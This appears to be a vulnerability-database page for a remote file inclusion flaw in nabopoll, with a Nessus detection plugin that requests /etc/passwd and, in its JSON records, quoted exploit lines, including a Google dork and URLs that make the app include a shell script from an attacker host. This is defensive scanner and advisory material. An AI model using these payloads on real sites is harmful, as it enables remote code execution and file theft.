Search...

Nabopoll survey.inc.php path Parameter Remote File Inclusion

2005-07-05T00:00:00

ID NABOPOLL_PATH_REMOTE_INCLUDES.NASL
Type nessus
Reporter This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-01-02T00:00:00

Description

The remote host is running nabopoll, a web-based voting / survey software for PHP and MySQL.

The installed version of nabopoll allows remote attackers to control the 'path' parameter used when including PHP code in the script 'survey.inc.php'. By leveraging this flaw, an attacker is able to view arbitrary files on the remote host and even execute arbitrary PHP code, possibly taken from third-party hosts.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(18618);
  script_version("1.17");

  script_cve_id("CVE-2005-2157");
  script_bugtraq_id(14134);

  script_name(english:"Nabopoll survey.inc.php path Parameter Remote File Inclusion");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is prone to a
remote file include attack." );
 script_set_attribute(attribute:"description", value:
"The remote host is running nabopoll, a web-based voting / survey
software for PHP and MySQL. 

The installed version of nabopoll allows remote attackers to control
the 'path' parameter used when including PHP code in the script
'survey.inc.php'.  By leveraging this flaw, an attacker is able to
view arbitrary files on the remote host and even execute arbitrary PHP
code, possibly taken from third-party hosts." );
 script_set_attribute(attribute:"see_also", value:"http://securitytracker.com/alerts/2005/Jul/1014355.html" );
 script_set_attribute(attribute:"solution", value:
"Ensure that PHP's 'register_globals' and 'allow_url_fopen' are
disabled." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2005/07/05");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/01");
 script_cvs_date("Date: 2018/06/13 18:56:28");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

  script_summary(english:"Checks for path parameter remote file include vulnerability in Nabopoll");
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Loop through CGI directories.
foreach dir (cgi_dirs()) {
  # Try to exploit one of the flaws to read /etc/passwd.
  w = http_send_recv3(method:"GET",
    item:string(
      dir, "/survey.inc.php?",
      "path=/etc/passwd%00"
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if...
  if (
    # there's an entry for root or...
    egrep(string:res, pattern:"root:.*:0:[01]:") ||
    # we get an error saying "failed to open stream" or "failed opening".
    #
    # nb: this suggests magic_quotes_gpc was enabled but passing 
    #     remote URLs might still work.
    egrep(string:res, pattern:"Warning: main\(/etc/passwd.+failed to open stream") ||
    egrep(string:res, pattern:"Warning: Failed opening '/etc/passwd.+for inclusion")
  ) {
    security_warning(port);
    exit(0);
  }
}

JSON Vulners Source

Initial Source

{"id": "NABOPOLL_PATH_REMOTE_INCLUDES.NASL", "bulletinFamily": "scanner", "title": "Nabopoll survey.inc.php path Parameter Remote File Inclusion", "description": "The remote host is running nabopoll, a web-based voting / survey\nsoftware for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control\nthe 'path' parameter used when including PHP code in the script\n'survey.inc.php'. By leveraging this flaw, an attacker is able to\nview arbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.", "published": "2005-07-05T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/18618", "reporter": "This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://securitytracker.com/alerts/2005/Jul/1014355.html"], "cvelist": ["CVE-2005-2157"], "type": "nessus", "lastseen": "2021-01-01T03:54:49", "edition": 24, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2157"]}, {"type": "osvdb", "idList": ["OSVDB:17706"]}, {"type": "exploitdb", "idList": ["EDB-ID:3315"]}], "modified": "2021-01-01T03:54:49", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-01T03:54:49", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(18618);\n script_version(\"1.17\");\n\n script_cve_id(\"CVE-2005-2157\");\n script_bugtraq_id(14134);\n\n script_name(english:\"Nabopoll survey.inc.php path Parameter Remote File Inclusion\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to a\nremote file include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running nabopoll, a web-based voting / survey\nsoftware for PHP and MySQL. \n\nThe installed version of nabopoll allows remote attackers to control\nthe 'path' parameter used when including PHP code in the script\n'survey.inc.php'. By leveraging this flaw, an attacker is able to\nview arbitrary files on the remote host and even execute arbitrary PHP\ncode, possibly taken from third-party hosts.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://securitytracker.com/alerts/2005/Jul/1014355.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Ensure that PHP's 'register_globals' and 'allow_url_fopen' are\ndisabled.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:W/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/07/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/07/01\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n script_summary(english:\"Checks for path parameter remote file include vulnerability in Nabopoll\");\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n script_copyright(english:\"This script is Copyright (C) 2005-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Loop through CGI directories.\nforeach dir (cgi_dirs()) {\n # Try to exploit one of the flaws to read /etc/passwd.\n w = http_send_recv3(method:\"GET\",\n item:string(\n dir, \"/survey.inc.php?\",\n \"path=/etc/passwd%00\"\n ), \n port:port\n );\n if (isnull(w)) exit(1, \"The web server on port \"+port+\" did not answer\");\n res = w[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(string:res, pattern:\"root:.*:0:[01]:\") ||\n # we get an error saying \"failed to open stream\" or \"failed opening\".\n #\n # nb: this suggests magic_quotes_gpc was enabled but passing \n # remote URLs might still work.\n egrep(string:res, pattern:\"Warning: main\\(/etc/passwd.+failed to open stream\") ||\n egrep(string:res, pattern:\"Warning: Failed opening '/etc/passwd.+for inclusion\")\n ) {\n security_warning(port);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "18618", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "PHP remote file inclusion vulnerability in survey.inc.php for nabopoll 1.2 allows remote attackers to execute arbitrary PHP code via the path parameter.", "edition": 3, "cvss3": {}, "published": "2005-07-06T04:00:00", "title": "CVE-2005-2157", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-2157"], "modified": "2011-03-08T02:23:00", "cpe": ["cpe:/a:nabocorp:nabopoll:1.2"], "id": "CVE-2005-2157", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2157", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:nabocorp:nabopoll:1.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T18:11:48", "description": "nabopoll 1.2 (survey.inc.php path) Remote File Include Vulnerability. CVE-2005-2157. Webapps exploit for php platform", "published": "2007-02-15T00:00:00", "type": "exploitdb", "title": "nabopoll 1.2 survey.inc.php path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2157"], "modified": "2007-02-15T00:00:00", "id": "EDB-ID:3315", "href": "https://www.exploit-db.com/exploits/3315/", "sourceData": "By Cr@zy_King\n\ncrazy_king@eno7.org\n\nThakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child & Liz0zim\n\nScript : nabopoll 1.x\n\nRisk : Remote File .nclude | High\n\nSite : http://nabocorp.com/\n\nGoogle Dork : inurl:\"nabopoll/\"\n\nExploit :\ninclude_once($path.\"includes/tags.inc.php\");\ninclude_once($path.\"config.inc.php\");\n\nFiles: survey.inc.php\n\nExploit : http://www.site.com/[path]/survey.inc.php?path=http://sheel.txt?\n\nAyyildiz.Org Present\n\n# milw0rm.com [2007-02-15]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3315/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:14", "bulletinFamily": "software", "cvelist": ["CVE-2005-2157"], "edition": 1, "description": "## Vulnerability Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/nabopoll/survey.inc.php?path=3Dhttp://[attacker]/test/xpl.php?cmd=3Did\n## References:\nVendor URL: http://www.nabocorp.com/nabopoll/\nSecurity Tracker: 1014355\n[Secunia Advisory ID:15910](https://secuniaresearch.flexerasoftware.com/advisories/15910/)\n[CVE-2005-2157](https://vulners.com/cve/CVE-2005-2157)\n", "modified": "2005-07-01T10:16:31", "published": "2005-07-01T10:16:31", "href": "https://vulners.com/osvdb/OSVDB:17706", "id": "OSVDB:17706", "title": "Nabopoll survey.inc.php path Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}